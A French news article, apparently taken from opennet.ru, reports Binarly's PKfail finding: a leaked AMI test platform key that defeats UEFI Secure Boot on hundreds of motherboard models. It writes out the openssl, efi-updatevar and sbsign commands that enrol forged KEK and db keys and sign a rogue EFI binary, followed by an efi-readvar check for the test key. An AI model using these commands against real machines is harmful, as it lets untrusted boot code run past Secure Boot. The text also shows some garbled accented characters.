Un clé de test permettant de contourner le UEFI Secure Boot a été découverte dans 806 modÚles de cartes mÚres.

Les chercheurs en sécurité de l'entreprise Binarly ont identifié une possibilité de contournement du mode de vérification de démarrage UEFI Secure Boot sur plus de 800 produits fabriqués par Acer, Dell, Fujitsu, Gigabyte, HP, Intel, Lenovo et Supermicro. Le problÚme a été surnommé PKfail et est lié à l'utilisation dans les firmwares d'une clé de plateforme (PK, Platform Key) non fiable, générée par AMI (American Megatrends International) et fournie comme un échantillon de test. Les firmwares les plus anciens utilisant cette clé de test ont été publiés en 2012, tandis que les plus récents sont datés de juin 2024. Selon les chercheurs, plus de 10 % de tous les firmwares vérifiés sont concernés par ce problÚme.

Dans les paramĂštres de la clĂ©, il Ă©tait indiquĂ© qu'elle n'Ă©tait pas fiable et ne devait pas ĂȘtre fournie dans ses produits. Il Ă©tait prĂ©vu que cette clĂ© de test soit remplacĂ©e par une clĂ© propre, mais les fabricants n'ont pas tenu compte de l'avertissement et ont utilisĂ© dans les firmwares finaux une clĂ© gĂ©nĂ©rique standard, envoyĂ©e Ă  tous les partenaires et clients d'AMI.

La partie privée de la clé de test AMI, nécessaire à la création de signatures numériques, a été rendue accessible au public aprÚs une fuite d'informations chez l'un des fabricants de matériel, dont un employé a par erreur publié dans un dépÎt public sur GitHub un code contenant cette clé. La clé privée a été placée dans un fichier chiffré, dont le chiffrement a utilisé un mot de passe simple de 4 caractÚres, facilement devinable par méthode de brute force.

La clé de plateforme est utilisée comme racine de confiance pour certifier les bases de données de clés pour Secure Boot. L'acquisition de la partie privée de la clé de plateforme compromet toute la chaßne de confiance impliquée dans la vérification de la validité des composants du systÚme de démarrage - en connaissant la clé de plateforme, il est possible de contourner la protection Secure Boot et de substituer ses propres composants lors du démarrage via la manipulation de la clé KEK (Key Exchange Key) et des bases de données "db" (Signature Database) et "dbx" (Forbidden Signature Database). La KEK est responsable de l'établissement de la chaßne de confiance entre le firmware et le systÚme d'exploitation, la "db" contient les certificats et signatures pour le chargeur de démarrage et les composants UEFI tiers, tandis que la "dbx" inclut les signatures révoquées de composants malveillants connus.

Pour mener une attaque, il suffit de gĂ©nĂ©rer de nouvelles clĂ©s et certificats pour KEK et db, puis d'utiliser la clĂ© de test de la plateforme, rendue publique, pour charger le certificat KEK créé dans le firmware UEFI. Une fois le certificat KEK chargĂ© dans le firmware, on peut utiliser la clĂ© privĂ©e associĂ©e pour charger dans la base de donnĂ©es db le nouveau certificat. AprĂšs le chargement du certificat db, la clĂ© privĂ©e qui lui est associĂ©e peut ĂȘtre utilisĂ©e pour signer les composants EFI chargĂ©s. openssl req -newkey rsa:4096 -nodes -keyout KEK.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY KEK/" -out KEK.crt openssl req -newkey rsa:4096 -nodes -keyout db.key -new -x509 -sha256 -days 3650 -subj "/CN=BRLY db/" -out db.crt efi-updatevar -a -c KEK.crt -k PK.key KEK efi-updatevar -a -c db.crt -k KEK.key db sbsign —key db.key —cert db.crt —output rogue.efi.signed rogue.efi

Pour vĂ©rifier la validitĂ© de la clĂ© de la plateforme, il suffit de lancer l'utilitaire « efi-readvar -v PK » du paquet efitools et de s'assurer que la clĂ© de la plateforme n'est pas un test : efi-readvar -v PK Variable PK, length 862 PK: List 0, type X509 Signature 0, size 834, owner 26dc4851-195f-4ae1-9a19-fbf883bbb35e Subject: CN=DO NOT TRUST — AMI Test PK Issuer: CN=DO NOT TRUST — AMI Test PK

Lire la vidéo


Source : opennet.ru
Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS đŸ”„ Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS | ProHoster